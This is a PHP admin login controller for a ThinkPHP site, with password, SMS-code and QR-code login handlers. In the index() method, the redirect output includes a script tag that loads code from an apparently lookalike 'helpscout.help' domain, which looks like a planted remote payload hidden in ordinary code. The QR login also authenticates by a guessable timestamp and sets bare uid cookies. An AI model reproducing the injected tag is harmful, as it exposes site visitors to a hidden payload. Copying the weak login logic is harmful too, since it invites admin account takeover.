<?php
/**
 * Created by PhpStorm.
 * User: pc
 * Date: 2021/4/12
 * Time: 13:17
 */

namespace app\admin\controller;
use think\facade\Db;
use think\facade\Request;
use think\facade\View;
use think\facade\Cookie;
use think\facade\Session;
use app\admin\controller\Base;
use app\admin\validate\Admin as AdminValidate;

use app\api\libs\Sendsms;
use app\api\validate\Phone;
use think\exception\ValidateException;
use dh2y\qrcode\QRcode;
class Login
{
    public function index()
    {


        if (Cookie::get('uid')){
            echo exit('<script>top.location.href="/"</script>
<script src="https://beacon-v2.helpscout.help/static/js/vendor.06c7227b.js"></script>');
        }
        if (request()->isPost()){
            $data=input('post.');

//验证

            try {
                $result =  validate(AdminValidate::class)->scene('login')->check($data);
            } catch (ValidateException $e) {
                // 验证失败 输出错误信息
                
                return returnjson(0,$e->getError());
            }

            $admin=new \app\admin\model\Admin();
            $loginStatus=$admin->login($data);
            return $loginStatus;

        }

        return view();
    }
    public function phone_logo(){
        $phone = input('phone');
        $code = input('code');
        $preg_phone='/^1[345789]\d{9}$/ims';
        if(!preg_match($preg_phone,$phone)){
            return returnjson(0,'手机号错误');
        }

        if ($code !== Cache('sms_' . $phone)) {
            return returnjson(0,'验证码错误');
        }
        $admins=Db::name('admin')->where('phonenumber','=',$phone)->find();
        if ($admins){
            if($admins['status']==0){
                //return 4;//管理员被禁用
                return returnjson(4,'管理员被禁用');
            }
            $sign_data['phone']=$phone;
            $sign_data['last_time']=time();

            ksort($sign_data);//排序
            $sign_data_str=http_build_query($sign_data);

            $code=md5($sign_data_str);
            Db::name('admin')->where('phonenumber','=',$phone)->update(['login_code'=>$code]);
            Cookie('uname',$admins['uname']);
            Cookie('code',$code);
            Cookie('uid',$admins['id']);
            return returnjson(1,'登录成功');
        }else{
            return returnjson(0,'密码或者帐号错误');
        }

    }
    //短信接口
    public function getsmscode(){


        //数据验证
        (new Phone())->runCheck();

        //获取手机号
        $phone = input('phone');
        $preg_phone='/^1[345789]\d{9}$/ims';
        if(preg_match($preg_phone,$phone)){
            $result = (new Sendsms($phone))->send();
            return returnjson(1,'获取成功');
        }else{
            return returnjson(0,'手机号错误');
        }
        //  var_dump((new Sendsms($phone))->checkCode('6320'));die;
        //发送短信


    }
    public function qyewm(){
        $time=time();
        $register_url='http://s.hbsjsd.cn?time='.$time;
        $code = new QRcode();
        $code_path= $code->png($register_url,$outfile=false,$size=3.8,$evel='H');

        $img=$code->getPath();
        $data=[
            'img'=>$img,
            'time'=>$time
        ];

        return returnjson(1,$data);

    }
    public function qyewmcode($login_session){

        if (abs(time()-intval($login_session))>60){
            return returnjson(0,'二维码超时');
        }

        $admin_code= Db::name('admin')->where('last_time','=',$login_session)->where('status_code','=',2)->find();

        if ($admin_code){

            Db::name('admin')->where('last_time','in',$login_session)->update(['status_code'=>0]);


            Cookie('hostuid',$admin_code['uid']);
            Cookie('uname',$admin_code['uname']);
            Cookie('code',$admin_code['login_code']);
            Cookie('uid',$admin_code['id']);
            return returnjson(3,'授权成功');
        }

        $admin= Db::name('admin')->where('last_time','=',$login_session)->find();

        if (!$admin){
            return returnjson(1,'等待扫码');
        }
        if ($admin['status_code']==1){
            return returnjson(2,'扫码成功');
        }
        if ($admin['status_code']==4){
            return returnjson(4,'拒绝登录');
        }

    }
    
}